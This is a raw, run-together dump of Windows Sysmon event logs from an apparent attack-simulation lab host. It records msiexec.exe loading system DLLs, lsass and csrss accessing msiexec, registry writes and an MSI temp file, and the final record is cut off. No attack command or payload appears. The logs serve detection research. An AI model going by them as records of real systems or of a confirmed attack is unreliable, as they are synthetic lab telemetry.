Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700092Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.662{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700091Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.662{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700090Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.662{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700089Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.662{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\AppPatch\apppatch64\AcLayers.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Windows Compatibility DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationACLAYERS.DLLMD5=18D8E2D6C17577D91A40C4A5AD9F6E37,SHA256=9E9CF9446EDA1F064E996F2022DBD3B3C7D6778574EA790B2B0412EA41C5F5F0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700088Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.662{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=92330FA0551BFFBB8C1C97E86F9A0264,SHA256=0F341AF375236EBF7047F6AE50F2834566F0D859F0F02B8A5FFD7F29C31B0117trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700087Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.662{7CF983DC-EE97-62A8-7E00-000000006202}18083200C:\Windows\system32\csrss.exe{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700086Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.662{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700085Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.662{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700084Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.662{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700083Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.662{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exeC:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700082Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.662{7CF983DC-EE55-62A8-0500-000000006202}396412C:\Windows\system32\csrss.exe{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700081Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.662{7CF983DC-981D-62AC-1A6B-000000006202}48402240C:\Windows\system32\msiexec.exe{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6f523|C:\Windows\System32\ADVAPI32.dll+189bf|C:\Windows\system32\Msi.dll+ba6c8|C:\Windows\system32\Msi.dll+16e294|C:\Windows\system32\Msi.dll+16e90c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 154100x80000000000000002700080Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.669{7CF983DC-9829-62AC-5A6B-000000006202}1028C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\System32\MsiExec.exe -Embedding 5A1A6FD002EAB33CF0BA30CBB2A9EC06C:\Windows\system32\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /VNT AUTHORITY\SYSTEM 13241300x80000000000000002700079Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:13.647{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SequenceDWORD (0x00000001)NT AUTHORITY\SYSTEM 12241200x80000000000000002700078Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:13.647{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 13241300x80000000000000002700077Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:13.647{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHashBinary DataNT AUTHORITY\SYSTEM 13241300x80000000000000002700076Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:13.647{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\OwnerBinary DataNT AUTHORITY\SYSTEM 12241200x80000000000000002700075Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:13.647{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002700074Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:13.647{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 10341000x80000000000000002700073Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.631{7CF983DC-981D-62AC-1A6B-000000006202}48403512C:\Windows\system32\msiexec.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\apphelp.dll+20ffd|C:\Windows\system32\apphelp.dll+209c1|C:\Windows\system32\Msi.dll+19fdbd|C:\Windows\system32\Msi.dll+2ea9e|C:\Windows\system32\Msi.dll+474f5|C:\Windows\system32\Msi.dll+10b3b5|C:\Windows\system32\Msi.dll+10a5d6|C:\Windows\system32\Msi.dll+f4b9f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700072Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.631{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\fusion.dll4.8.3761.0 built by: NET48REL1Assembly managerMicrosoft® .NET FrameworkMicrosoft Corporationfusion.dllMD5=2A73BA7551F7B631AA484CAABD372F06,SHA256=F876EEEC603221DCDD098D1E2A1118012254E9C67851E749DF61D573EA949F55trueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002700071Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.631{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002700070Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.631{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 10341000x80000000000000002700069Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.631{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002700068Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.631{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 11241100x80000000000000002700067Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.631{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI62FC.tmp2022-06-17 15:05:13.631NT AUTHORITY\SYSTEM 10341000x80000000000000002699966Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699965Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699964Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699963Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699962Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699961Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699960Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699959Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699958Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002699957Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:13.397{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9829-62AC-596B-000000006202}3736c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT 